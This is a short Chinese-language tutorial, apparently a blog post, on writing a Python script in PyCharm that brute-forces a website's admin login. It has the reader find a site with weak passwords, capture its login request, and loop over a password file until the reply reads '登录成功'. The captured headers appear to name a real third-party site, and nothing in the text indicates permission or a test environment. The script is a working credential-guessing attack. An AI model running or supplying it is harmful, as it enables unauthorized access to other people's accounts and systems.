如何使用Pycharm来编写poc检测弱口令登录？

如何使用Pycharm来编写poc检测弱口令登录？

0x01查询弱口令漏洞

首先需要我们找到有弱口令登录的网址

例如我们找到一个url：http://xxx.com.xxxxxx

然后对网站登录页面测试弱口令，尝试登录后对其进行抓包

	"User-Agent":"Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:128.0)Gecko/20100101Firefox/128.0",
    "Accept":"*/*",
    "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding":"gzip,deflate,br",
    "Content-Type":"application/x-www-form-urlencoded;charset=UTF-8",
    "X-Requested-With":"XMLHttpRequest",
    "Content-Length":"42",
    "Origin":"http://xc.whhzys.cn",
    "Connection":"keep-alive",
    "Referer":"http://xc.whhzys.cn/admin.php/login/index",
    "Priority":"u=0"

发现抓包后的请求头内容

找到请求体的内容

username=admin&password=passwd&remember=on

0x02python编写poc

然后我们使用pycharm来编写poc

import requests

# 定义目标URL和请求头
url = "http://xxxx.xxxx/login/index"
url1 = "http://xxxx.xxx/login/index"
headers = {
    "User-Agent":"Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:128.0)Gecko/20100101Firefox/128.0",
    "Accept":"*/*",
    "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding":"gzip,deflate,br",
    "Content-Type":"application/x-www-form-urlencoded;charset=UTF-8",
    "X-Requested-With":"XMLHttpRequest",
    "Content-Length":"42",
    "Origin":"http://xc.whhzys.cn",
    "Connection":"keep-alive",
    "Referer":"http://xc.whhzys.cn/admin.php/login/index",
    "Priority":"u=0",
}

result = requests.get(url = url)

with open("password.txt",'r') as f:
    for i in f.readlines():
        passwd = i.strip()
        data = f"username=admin&password={passwd}&remember=on"
        res1 = requests.post(url = url1, headers = headers, data = data)
        # print(res1.text)
        if "登录成功" in res1.text:
            print(f"登录成功, 密码为{passwd}")
            break

最后将抓包的内容写入到poc中，执行结果查看

好小子，离成功又近一步！！！